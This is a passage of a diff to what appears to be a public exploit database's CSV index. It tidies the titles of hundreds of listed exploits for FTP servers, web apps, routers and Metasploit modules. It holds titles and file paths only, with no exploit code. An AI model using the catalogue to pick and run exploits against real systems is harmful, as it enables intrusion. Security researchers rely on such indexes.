'Phonebook.php' SQL Injection",2008-10-06,"Jaykishan Nirmal",windows,remote,0 @@ -14648,7 +14650,7 @@ id,file,description,date,author,platform,type,port 32781,platforms/multiple/remote/32781.txt,"PyBlosxom 1.6.3 Atom Flavor - Multiple XML Injection Vulnerabilities",2009-02-09,"Nam Nguyen",multiple,remote,0 32789,platforms/unix/remote/32789.rb,"Sophos Web Protection Appliance Interface - Authenticated Arbitrary Command Execution (Metasploit)",2014-04-10,Metasploit,unix,remote,443 32791,platforms/multiple/remote/32791.c,"OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak Exploit (1)",2014-04-10,prdelka,multiple,remote,443 -32794,platforms/php/remote/32794.rb,"Vtiger - Install Unauthenticated Remote Command Execution (Metasploit)",2014-04-10,Metasploit,php,remote,80 +32794,platforms/php/remote/32794.rb,"Vtiger - 'Install' Unauthenticated Remote Command Execution (Metasploit)",2014-04-10,Metasploit,php,remote,80 32795,platforms/novell/remote/32795.txt,"Novell QuickFinder Server - Cross-Site Scripting Multiple Vulnerabilities",2009-02-09,"Ivan Sanchez",novell,remote,0 32796,platforms/linux/remote/32796.txt,"Swann DVR4 SecuraNet - Directory Traversal",2009-02-10,"Terry Froy",linux,remote,0 32798,platforms/multiple/remote/32798.pl,"ProFTPd 1.3 - 'mod_sql Username' SQL Injection",2009-02-10,AlpHaNiX,multiple,remote,0 @@ -14768,7 +14770,7 @@ id,file,description,date,author,platform,type,port 33272,platforms/windows/remote/33272.txt,"Autodesk 3ds - Max Application Callbacks Arbitrary Command Execution",2009-10-23,"Sebastian Tello",windows,remote,0 33264,platforms/windows/remote/33264.txt,"Microsoft Internet Explorer 8 - X.509 Certificate Common Name Encoding Multiple Security Bypass Vulnerabilities",2009-08-05,"Dan Kaminsky",windows,remote,0 33273,platforms/windows/remote/33273.scn,"Autodesk SoftImage 7.0 Scene - '.TOC' File Remote Code Execution",2009-11-23,"Diego Juarez",windows,remote,0 -33645,platforms/windows/remote/33645.py,"httpdx 1.5 - 'MKD' Command Directory Traversal",2010-02-15,fb1h2s,windows,remote,0 +33645,platforms/windows/remote/33645.py,"httpdx 1.5 - 'MKD' Directory Traversal",2010-02-15,fb1h2s,windows,remote,0 33310,platforms/multiple/remote/33310.nse,"VMware Server 2.0.1 / ESXi Server 3.5 - Directory Traversal",2009-10-27,"Justin Morehouse",multiple,remote,0 33311,platforms/linux/remote/33311.txt,"KDE 4.3.2 - Multiple Input Validation Vulnerabilities",2009-10-27,"Tim Brown",linux,remote,0 33313,platforms/linux/remote/33313.txt,"Mozilla Firefox 3.5.3 and SeaMonkey 1.1.17 - 'libpr0n' GIF Parser Heap Based Buffer Overflow",2009-10-27,regenrecht,linux,remote,0 @@ -14866,7 +14868,7 @@ id,file,description,date,author,platform,type,port 33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure",2010-04-22,"Veerendra G.G",multiple,remote,0 33855,platforms/linux/remote/33855.txt,"MIT Kerberos 5 - 'src/kdc/do_tgs_req.c' Ticket Renewal Double-Free Memory Corruption",2010-04-20,"Joel Johnson",linux,remote,0 34143,platforms/windows/remote/34143.txt,"XnView 1.97.4 - '.MBM' File Remote Heap Buffer Overflow",2010-06-14,"Mauro Olea",windows,remote,0 -33862,platforms/hardware/remote/33862.rb,"D-Link Devices - Authentication.cgi Buffer Overflow (Metasploit)",2014-06-24,Metasploit,hardware,remote,80 +33862,platforms/hardware/remote/33862.rb,"D-Link Devices - 'Authentication.cgi' Buffer Overflow (Metasploit)",2014-06-24,Metasploit,hardware,remote,80 33863,platforms/hardware/remote/33863.rb,"D-Link Devices - 'hedwig.cgi' Buffer Overflow in Cookie Header (Metasploit)",2014-06-24,Metasploit,hardware,remote,80 33865,platforms/linux/remote/33865.rb,"Alienvault Open Source SIEM (OSSIM) - av-centerd Command Injection (Metasploit)",2014-06-24,Metasploit,linux,remote,40007 33869,platforms/hardware/remote/33869.txt,"Huawei EchoLife HG520 3.10.18.5-1.0.5.0 - Remote Information Disclosure",2010-04-22,hkm,hardware,remote,0 @@ -14887,7 +14889,7 @@ id,file,description,date,author,platform,type,port 33988,platforms/php/remote/33988.txt,"PHP 5.3.x < 5.3.2 - 'ext/phar/stream.c' / 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities",2010-05-14,"Stefan Esser",php,remote,0 33989,platforms/windows/remote/33989.rb,"Oracle Event Processing FileUploadServlet - Arbitrary File Upload (Metasploit)",2014-07-07,Metasploit,windows,remote,9002 33929,platforms/multiple/remote/33929.py,"Gitlist 0.4.0 - Remote Code Execution",2014-06-30,drone,multiple,remote,0 -33935,platforms/windows/remote/33935.txt,"rbot 0.9.14 - '!react' Command Unauthorized Access",2010-02-24,nks,windows,remote,0 +33935,platforms/windows/remote/33935.txt,"rbot 0.9.14 - '!react' Unauthorized Access",2010-02-24,nks,windows,remote,0 33938,platforms/hardware/remote/33938.txt,"Sterlite SAM300 AX Router - 'Stat_Radio' Cross-Site Scripting",2010-02-04,"Karn Ganeshen",hardware,remote,0 33940,platforms/multiple/remote/33940.txt,"VMware View 3.1.x - URL Processing Cross-Site Scripting",2010-05-05,"Alexey Sintsov",multiple,remote,0 33941,platforms/windows/remote/33941.html,"TVUPlayer 2.4.4.9beta1 - 'PlayerOcx.ocx' ActiveX Control Arbitrary File Overwrite",2010-02-03,"Evdokimov Dmitriy",windows,remote,0 @@ -14939,7 +14941,7 @@ id,file,description,date,author,platform,type,port 34310,platforms/multiple/remote/34310.txt,"Oracle Business Process Management 10.3.2 - Cross-Site Scripting",2010-07-13,Markot,multiple,remote,0 34312,platforms/multiple/remote/34312.txt,"Oracle WebLogic Server 10.3.3 - Encoded URL Remote",2010-07-13,"Timothy D. Morgan",multiple,remote,0 34316,platforms/hardware/remote/34316.txt,"Juniper Networks SA2000 SSL VPN Appliance - 'welcome.cgi' Cross-Site Scripting",2010-06-09,"Richard Brain",hardware,remote,0 -34335,platforms/linux/remote/34335.rb,"VMTurbo Operations Manager 4.6 - vmtadmin.cgi Remote Command Execution (Metasploit)",2014-08-14,Metasploit,linux,remote,80 +34335,platforms/linux/remote/34335.rb,"VMTurbo Operations Manager 4.6 - 'vmtadmin.cgi' Remote Command Execution (Metasploit)",2014-08-14,Metasploit,linux,remote,80 34334,platforms/win_x86-64/remote/34334.rb,"Oracle VM VirtualBox 4.3.6 - 3D Acceleration Virtual Machine Escape (Metasploit)",2014-08-14,Metasploit,win_x86-64,remote,0 34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate - Arbitrary File Upload (Metasploit)",2014-09-09,Metasploit,windows,remote,8020 34358,platforms/linux/remote/34358.txt,"Mozilla Firefox and SeaMonkey Plugin Parameters - Buffer Overflow",2010-07-20,J23,linux,remote,0 @@ -15066,7 +15068,7 @@ id,file,description,date,author,platform,type,port 35180,platforms/bsd/remote/35180.rb,"Citrix Netscaler SOAP Handler - Remote Code Execution (Metasploit)",2014-11-06,Metasploit,bsd,remote,0 35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 - 'message.php' PHP Code Execution (Metasploit)",2014-11-06,Metasploit,php,remote,80 35184,platforms/hardware/remote/35184.py,"Belkin N750 - 'jump?login' Buffer Overflow",2014-11-06,"Marco Vaz",hardware,remote,8080 -35188,platforms/windows/remote/35188.py,"Solar FTP Server 2.1.1 - 'PASV' Command Remote Buffer Overflow",2011-01-10,"John Leitch",windows,remote,0 +35188,platforms/windows/remote/35188.py,"Solar FTP Server 2.1.1 - 'PASV' Remote Buffer Overflow",2011-01-10,"John Leitch",windows,remote,0 35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 - 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0 35211,platforms/java/remote/35211.rb,"Visual Mining NetCharts Server - Remote Code Execution (Metasploit)",2014-11-10,Metasploit,java,remote,8001 35225,platforms/windows/remote/35225.c,"Avira AntiVir Personal - Multiple Code Execution Vulnerabilities (1)",2011-01-14,D.Elser,windows,remote,0 @@ -15204,8 +15206,8 @@ id,file,description,date,author,platform,type,port 36045,platforms/cgi/remote/36045.txt,"SurgeFTP 23b6 - Cross-Site Scripting Multiple Vulnerabilities",2011-08-16,"Houssam Sahli",cgi,remote,0 36049,platforms/windows/remote/36049.html,"StudioLine Photo Basic 3.70.34.0 - 'NMSDVDXU.dll' ActiveX Control Arbitrary File Overwrite",2011-08-17,"High-Tech Bridge SA",windows,remote,0 36056,platforms/windows/remote/36056.rb,"Achat 0.150 beta7 - Buffer Overflow (Metasploit)",2015-02-11,Metasploit,windows,remote,9256 -36075,platforms/windows/remote/36075.py,"Freefloat FTP Server - 'ALLO' Command Remote Buffer Overflow",2011-08-20,Black.Spook,windows,remote,0 -36078,platforms/windows/remote/36078.py,"PCMan FTP Server 2.0.7 - 'MKD' Command Buffer Overflow",2015-02-14,R-73eN,windows,remote,0 +36075,platforms/windows/remote/36075.py,"Freefloat FTP Server - 'ALLO' Remote Buffer Overflow",2011-08-20,Black.Spook,windows,remote,0 +36078,platforms/windows/remote/36078.py,"PCMan FTP Server 2.0.7 - 'MKD' Buffer Overflow",2015-02-14,R-73eN,windows,remote,0 36100,platforms/windows/remote/36100.rb,"X360 VideoPlayer - ActiveX Control Buffer Overflow (Metasploit)",2015-02-17,Metasploit,windows,remote,0 36101,platforms/java/remote/36101.rb,"Java JMX - Server Insecure Configuration Java Code Execution (Metasploit)",2015-02-17,Metasploit,java,remote,1617 36111,platforms/windows/remote/36111.py,"Cerberus FTP Server 4.0.9.8 - Remote Buffer Overflow",2011-09-05,KedAns-Dz,windows,remote,0 @@ -15296,7 +15298,7 @@ id,file,description,date,author,platform,type,port 36811,platforms/php/remote/36811.rb,"WordPress Plugin Creative Contact Form - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,php,remote,80 36812,platforms/php/remote/36812.rb,"WordPress Plugin Work The Flow - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,php,remote,80 36829,platforms/windows/remote/36829.txt,"R2/Extreme 1.65 - Stack Based Buffer Overflow / Directory Traversal",2012-02-17,"Luigi Auriemma",windows,remote,0 -36831,platforms/hardware/remote/36831.txt,"Endian Firewall 2.4 - openvpn_users.cgi PATH_INFO Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0 +36831,platforms/hardware/remote/36831.txt,"Endian Firewall 2.4 - 'openvpn_users.cgi?PATH_INFO' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0 36832,platforms/hardware/remote/36832.txt,"Endian Firewall 2.4 - 'dnat.cgi?createrule' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0 36833,platforms/hardware/remote/36833.txt,"Endian Firewall 2.4 - 'dansguardian.cgi?addrule' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0 36836,platforms/multiple/remote/36836.py,"Legend Perl IRC Bot - Remote Code Execution (PoC)",2015-04-27,"Jay Turla",multiple,remote,0 @@ -15364,7 +15366,7 @@ id,file,description,date,author,platform,type,port 37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",windows,remote,0 37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway - Cross-Site Scripting Multiple Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0 37729,platforms/windows/remote/37729.py,"FileZilla Client 2.2.x - Buffer Overflow (SEH)",2015-08-07,ly0n,windows,remote,0 -37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - 'PUT' Command Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21 +37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - 'PUT' Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21 37746,platforms/windows/remote/37746.py,"Netsparker 2.3.x - Remote Code Execution",2015-08-09,"Hesam Bazvand",windows,remote,0 37947,platforms/multiple/remote/37947.txt,"Litespeed Web Server - 'gtitle' Cross-Site Scripting",2012-03-12,K1P0D,multiple,remote,0 37949,platforms/linux/remote/37949.txt,"ModSecurity - 'POST' Security Bypass",2012-10-17,"Bernhard Mueller",linux,remote,0 @@ -15391,9 +15393,9 @@ id,file,description,date,author,platform,type,port 37969,platforms/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN - 'refreshURL' Open Redirection",2012-10-21,"Aung Khant",hardware,remote,0 37985,platforms/windows/remote/37985.py,"FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution",2015-08-27,"Naser Farhadi",windows,remote,80 37996,platforms/windows/remote/37996.txt,"Axigen Mail Server - 'Filename' Directory Traversal",2012-10-31,"Zhao Liang",windows,remote,0 -38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - 'GET' Command Buffer Overflow",2015-08-29,Koby,windows,remote,21 +38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - 'GET' Buffer Overflow",2015-08-29,Koby,windows,remote,21 38005,platforms/windows/remote/38005.asp,"MS SQL Server 2000/2005 - SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit",2015-08-29,ylbhz,windows,remote,0 -38013,platforms/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - 'RENAME' Command Buffer Overflow",2015-08-29,Koby,windows,remote,21 +38013,platforms/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - 'RENAME' Buffer Overflow",2015-08-29,Koby,windows,remote,21 38020,platforms/hardware/remote/38020.py,"Huawei (Multiple Products) - Password Encryption",2012-11-13,"Roberto Paleari",hardware,remote,0 38049,platforms/multiple/remote/38049.txt,"Greenstone - Multiple Vulnerabilities",2012-11-23,AkaStep,multiple,remote,0 38058,platforms/ios/remote/38058.py,"Twitter for iPhone - Man in the Middle Security",2012-11-23,"Carlos Reventlov",ios,remote,0 @@ -15453,7 +15455,7 @@ id,file,description,date,author,platform,type,port 38495,platforms/hardware/remote/38495.html,"Belkin F5D8236-4 Router - Cross-Site Request Forgery",2013-04-25,"Jacob Holcomb",hardware,remote,0 38500,platforms/windows/remote/38500.php,"HTML Compiler - Remote Code Execution",2015-10-20,"Ehsan Noreddini",windows,remote,0 38501,platforms/hardware/remote/38501.txt,"Cisco Linksys E4200 - '/apply.cgi' Multiple Cross-Site Scripting Vulnerabilities",2013-04-27,"Carl Benedict",hardware,remote,0 -38505,platforms/php/remote/38505.rb,"Zpanel - Remote Unauthenticated Remote Code Execution (Metasploit)",2015-10-21,Metasploit,php,remote,0 +38505,platforms/php/remote/38505.rb,"Zpanel - Unauthenticated Remote Code Execution (Metasploit)",2015-10-21,Metasploit,php,remote,0 38512,platforms/windows/remote/38512.php,"The World Browser 3.0 Final - Remote Code Execution",2015-10-22,"Ehsan Noreddini",windows,remote,0 38513,platforms/windows/remote/38513.txt,"TeamSpeak Client 3.0.18.1 - Remote File Inclusion / Remote Code Execution",2015-10-22,Scurippio,windows,remote,0 38521,platforms/multiple/remote/38521.c,"Python RRDtool Module - Function Format String",2013-05-18,"Thomas Pollet",multiple,remote,0 @@ -15603,7 +15605,7 @@ id,file,description,date,author,platform,type,port 39693,platforms/unix/remote/39693.rb,"Dell KACE K1000 - Arbitrary File Upload (Metasploit)",2016-04-13,Metasploit,unix,remote,0 39698,platforms/windows/remote/39698.html,"Microsoft Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)",2016-04-14,"Ashfaq Ansari",windows,remote,0 39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk - Authenticated Arbitrary File Upload (Metasploit)",2016-04-18,Metasploit,multiple,remote,80 -39729,platforms/win_x86/remote/39729.rb,"PCMan FTP Server 2.0.7 - 'RENAME' Command Buffer Overflow (Metasploit)",2016-04-25,"Jonathan Smith",win_x86,remote,21 +39729,platforms/win_x86/remote/39729.rb,"PCMan FTP Server 2.0.7 - 'RENAME' Buffer Overflow (Metasploit)",2016-04-25,"Jonathan Smith",win_x86,remote,21 39735,platforms/windows/remote/39735.rb,"Advantech Webaccess Dashboard Viewer - Arbitrary File Upload (Metasploit)",2016-04-26,Metasploit,windows,remote,80 39736,platforms/linux/remote/39736.txt,"libgd 2.1.1 - Signedness Heap Overflow",2016-04-26,"Hans Jerry Illikainen",linux,remote,0 39742,platforms/php/remote/39742.txt,"PHP 7.0.5 - ZipArchive::getFrom* Integer Overflow",2016-04-28,"Hans Jerry Illikainen",php,remote,0 @@ -15620,7 +15622,7 @@ id,file,description,date,author,platform,type,port 39858,platforms/windows/remote/39858.py,"HP Data Protector A.09.00 - Arbitrary Command Execution",2016-05-26,"Ian Lovering",windows,remote,0 39874,platforms/windows/remote/39874.rb,"HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0 39907,platforms/windows/remote/39907.rb,"Poison Ivy 2.1.x (C2 Server) - Buffer Overflow (Metasploit)",2016-06-10,"Jos Wetzels",windows,remote,3460 -39917,platforms/cgi/remote/39917.rb,"IPFire - proxy.cgi Remote Code Execution (Metasploit)",2016-06-10,Metasploit,cgi,remote,444 +39917,platforms/cgi/remote/39917.rb,"IPFire - 'proxy.cgi' Remote Code Execution (Metasploit)",2016-06-10,Metasploit,cgi,remote,444 39918,platforms/cgi/remote/39918.rb,"IPFire - Bash Environment Variable Injection (Shellshock) (Metasploit)",2016-06-10,Metasploit,cgi,remote,444 39919,platforms/multiple/remote/39919.rb,"Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution (Metasploit)",2016-06-10,Metasploit,multiple,remote,8080 40441,platforms/hardware/remote/40441.py,"Grandsteam GXV3611_HD - SQL Injection",2016-09-29,pizza1337,hardware,remote,0 @@ -15628,7 +15630,7 @@ id,file,description,date,author,platform,type,port 39958,platforms/linux/remote/39958.rb,"Bomgar Remote Support - Unauthenticated Code Execution (Metasploit)",2016-06-15,"Markus Wulftange",linux,remote,443 39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution (Metasploit)",2016-06-17,Metasploit,linux,remote,443 39985,platforms/windows/remote/39985.rb,"DarkComet Server - Arbitrary File Download (Metasploit)",2016-06-21,"Jos Wetzels",windows,remote,1604 -39999,platforms/win_x86-64/remote/39999.rb,"PCMan FTP Server 2.0.7 - 'ls' Command Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win_x86-64,remote,21 +39999,platforms/win_x86-64/remote/39999.rb,"PCMan FTP Server 2.0.7 - 'ls' Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win_x86-64,remote,21 40004,platforms/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload (Metasploit)",2016-06-22,s0nk3y,php,remote,80 40064,platforms/linux/remote/40064.txt,"GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution",2016-07-06,"Dawid Golunski",linux,remote,0 40067,platforms/linux/remote/40067.rb,"Nagios XI Chained - Remote Code Execution (Metasploit)",2016-07-06,Metasploit,linux,remote,80 @@ -15655,7 +15657,7 @@ id,file,description,date,author,platform,type,port 40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 < 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0 40232,platforms/linux/remote/40232.py,"FreePBX 13/14 - Remote Command Execution / Privilege Escalation",2016-08-12,pgt,linux,remote,0 40280,platforms/windows/remote/40280.py,"Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)",2016-02-26,ohnozzy,windows,remote,0 -40234,platforms/windows/remote/40234.py,"EasyFTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit",2012-03-03,Swappage,windows,remote,0 +40234,platforms/windows/remote/40234.py,"EasyFTP Server 1.7.0.11 - 'APPE' Remote Buffer Overflow",2012-03-03,Swappage,windows,remote,0 40279,platforms/windows/remote/40279.py,"Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067)",2016-02-26,ohnozzy,windows,remote,0 40235,platforms/hardware/remote/40235.py,"Samsung Smart Home Camera SNH-P-6410 - Command Injection",2016-08-14,PentestPartners,hardware,remote,0 40258,platforms/hardware/remote/40258.txt,"Cisco ASA 8.x - 'EXTRABACON' Authentication Bypass",2016-08-18,"Shadow Brokers",hardware,remote,161 @@ -15681,23 +15683,23 @@ id,file,description,date,author,platform,type,port 40633,platforms/hardware/remote/40633.py,"Komfy Switch with Camera DKZ-201S/W - WiFi Password Disclosure",2016-10-26,"Jason Doyle",hardware,remote,0 40643,platforms/hardware/remote/40643.txt,"InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials",2016-10-28,LiquidWorm,hardware,remote,0 40651,platforms/windows/remote/40651.py,"Rumba FTP Client 4.x - Stack Buffer Overflow (SEH)",2016-10-31,"Umit Aksu",windows,remote,0 -40670,platforms/windows/remote/40670.py,"PCMan FTP Server 2.0.7 - 'DELETE' Command Buffer Overflow",2016-10-31,ScrR1pTK1dd13,windows,remote,0 -40674,platforms/windows/remote/40674.py,"Freefloat FTP Server 1.0 - 'ABOR' Command Buffer Overflow",2016-11-01,Ger,windows,remote,0 -40672,platforms/windows/remote/40672.py,"Freefloat FTP Server 1.0 - 'RMD' Command Buffer Overflow",2016-11-01,Karri93,windows,remote,0 -40673,platforms/windows/remote/40673.py,"Freefloat FTP Server 1.0 - 'HOST' Command Buffer Overflow",2016-11-01,Cybernetic,windows,remote,0 +40670,platforms/windows/remote/40670.py,"PCMan FTP Server 2.0.7 - 'DELETE' Buffer Overflow",2016-10-31,ScrR1pTK1dd13,windows,remote,0 +40674,platforms/windows/remote/40674.py,"Freefloat FTP Server 1.0 - 'ABOR' Buffer Overflow",2016-11-01,Ger,windows,remote,0 +40672,platforms/windows/remote/40672.py,"Freefloat FTP Server 1.0 - 'RMD' Buffer Overflow",2016-11-01,Karri93,windows,remote,0 +40673,platforms/windows/remote/40673.py,"Freefloat FTP Server 1.0 - 'HOST' Buffer Overflow",2016-11-01,Cybernetic,windows,remote,0 40675,platforms/windows/remote/40675.py,"KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)",2016-11-01,n30m1nd,windows,remote,0 -40677,platforms/windows/remote/40677.py,"Freefloat FTP Server 1.0 - 'RENAME' Command Buffer Overflow",2016-11-01,Eagleblack,windows,remote,0 -40680,platforms/windows/remote/40680.py,"PCMan FTP Server 2.0.7 - 'UMASK' Command Buffer Overflow",2016-11-02,Eagleblack,windows,remote,0 -40681,platforms/windows/remote/40681.py,"Freefloat FTP Server 1.0 - 'DIR' Command Buffer Overflow",2016-11-02,ScrR1pTK1dd13,windows,remote,0 +40677,platforms/windows/remote/40677.py,"Freefloat FTP Server 1.0 - 'RENAME' Buffer Overflow",2016-11-01,Eagleblack,windows,remote,0 +40680,platforms/windows/remote/40680.py,"PCMan FTP Server 2.0.7 - 'UMASK' Buffer Overflow",2016-11-02,Eagleblack,windows,remote,0 +40681,platforms/windows/remote/40681.py,"Freefloat FTP Server 1.0 - 'DIR' Buffer Overflow",2016-11-02,ScrR1pTK1dd13,windows,remote,0 40689,platforms/linux/remote/40689.rb,"Bassmaster 1.5.1 - Batch Arbitrary JavaScript Injection Remote Code Execution (Metasploit)",2016-11-02,Metasploit,linux,remote,0 40693,platforms/windows/remote/40693.py,"WinaXe 7.7 'FTP client' - Remote Buffer Overflow",2016-11-03,hyp3rlinx,windows,remote,0 40694,platforms/windows/remote/40694.txt,"Rapid PHP Editor 14.1 - Remote Command Execution",2016-11-03,hyp3rlinx,windows,remote,0 -40704,platforms/windows/remote/40704.py,"PCMan FTP Server 2.0.7 - 'ACCT' Command Buffer Overflow",2016-11-03,Cybernetic,windows,remote,0 -40711,platforms/windows/remote/40711.py,"Freefloat FTP Server 1.0 - 'SITE ZONE' Command Buffer Overflow",2016-11-04,"Luis Noriega",windows,remote,0 -40712,platforms/windows/remote/40712.py,"PCMan FTP Server 2.0.7 - 'NLST' Command Buffer Overflow",2016-11-04,Karri93,windows,remote,0 -40713,platforms/windows/remote/40713.py,"PCMan FTP Server 2.0.7 - 'SITE CHMOD' Command Buffer Overflow",2016-11-04,"Luis Noriega",windows,remote,0 -40714,platforms/windows/remote/40714.py,"PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow",2016-11-04,"Pablo González",windows,remote,0 -40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP Server 1.02 - 'RETR' Command Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0 +40704,platforms/windows/remote/40704.py,"PCMan FTP Server 2.0.7 - 'ACCT' Buffer Overflow",2016-11-03,Cybernetic,windows,remote,0 +40711,platforms/windows/remote/40711.py,"Freefloat FTP Server 1.0 - 'SITE ZONE' Buffer Overflow",2016-11-04,"Luis Noriega",windows,remote,0 +40712,platforms/windows/remote/40712.py,"PCMan FTP Server 2.0.7 - 'NLST' Buffer Overflow",2016-11-04,Karri93,windows,remote,0 +40713,platforms/windows/remote/40713.py,"PCMan FTP Server 2.0.7 - 'SITE CHMOD' Buffer Overflow",2016-11-04,"Luis Noriega",windows,remote,0 +40714,platforms/windows/remote/40714.py,"PCMan FTP Server 2.0.7 - 'PORT' Buffer Overflow",2016-11-04,"Pablo González",windows,remote,0 +40715,platforms/windows/remote/40715.py,"BolinTech DreamFTP Server 1.02 - 'RETR' Remote Buffer Overflow",2016-11-04,ScrR1pTK1dd13,windows,remote,0 40720,platforms/hardware/remote/40720.sh,"Acoem 01dB CUBE/DUO Smart Noise Monitor - Password Change",2016-11-07,"Todor Donev",hardware,remote,0 40721,platforms/windows/remote/40721.html,"Microsoft Internet Explorer 8/9/10/11 / IIS / CScript.exe/WScript.exe VBScript - CRegExp..Execute Use of Uninitialized Memory (MS14-080/MS14-084)",2016-11-07,Skylined,windows,remote,0 40758,platforms/windows/remote/40758.rb,"Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow' (Metasploit)",2016-11-14,Metasploit,windows,remote,0 @@ -15840,7 +15842,7 @@ id,file,description,date,author,platform,type,port 42186,platforms/windows/remote/42186.py,"Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass)",2017-06-15,"bl4ck h4ck3r",windows,remote,0 42222,platforms/windows/remote/42222.py,"SpyCamLizard 1.230 - Buffer Overflow",2017-06-20,abatchy17,windows,remote,0 42251,platforms/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",python,remote,443 -42257,platforms/cgi/remote/42257.rb,"NETGEAR DGN2200 - dnslookup.cgi Command Injection (Metasploit)",2017-06-26,Metasploit,cgi,remote,80 +42257,platforms/cgi/remote/42257.rb,"NETGEAR DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit)",2017-06-26,Metasploit,cgi,remote,80 42282,platforms/windows/remote/42282.rb,"Veritas/Symantec Backup Exec - SSL NDMP Connection Use-After-Free (Metasploit)",2017-06-29,Metasploit,windows,remote,10000 42283,platforms/java/remote/42283.rb,"ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)",2017-06-29,Metasploit,java,remote,0 42288,platforms/android/remote/42288.txt,"BestSafe Browser - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0 @@ -15859,7 +15861,7 @@ id,file,description,date,author,platform,type,port 42354,platforms/win_x86-64/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,redr2e,win_x86-64,remote,0 42355,platforms/hardware/remote/42355.c,"CenturyLink ZyXEL PK5001Z Router - Root Remote Code Execution",2017-07-24,oxagast,hardware,remote,0 42369,platforms/cgi/remote/42369.rb,"IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)",2017-07-24,Metasploit,cgi,remote,0 -42370,platforms/unix/remote/42370.rb,"VICIdial 2.9 RC 1 to 2.13 RC1 - user_authorization Unauthenticated Command Execution (Metasploit)",2017-07-24,Metasploit,unix,remote,0 +42370,platforms/unix/remote/42370.rb,"VICIdial 2.9 RC 1 < 2.13 RC1 - 'user_authorization' Unauthenticated Command Execution (Metasploit)",2017-07-24,Metasploit,unix,remote,0 42395,platforms/windows/remote/42395.py,"DiskBoss Enterprise 8.2.14 - Buffer Overflow",2017-07-30,"Ahmad Mahfouz",windows,remote,0 42484,platforms/windows/remote/42484.html,"Mozilla Firefox < 45.0 - 'nsHtml5TreeBuilder' Use-After-Free (EMET 5.52 Bypass)",2017-08-18,"Hans Jerry Illikainen",windows,remote,0 42541,platforms/php/remote/42541.rb,"IBM OpenAdmin Tool - SOAP welcomeServer PHP Code Execution (Metasploit)",2017-08-22,Metasploit,php,remote,0 @@ -16579,9 +16581,9 @@ id,file,description,date,author,platform,type,port 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 -53,platforms/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' whereami.cgi Remote Exploit",2003-07-10,knight420,cgi,webapps,0 +53,platforms/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote Exploit",2003-07-10,knight420,cgi,webapps,0 38772,platforms/hardware/webapps/38772.txt,"ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,80 -137,platforms/php/webapps/137.pl,"phpBB 2.0.6 - search_id SQL Injection MD5 Hash Remote 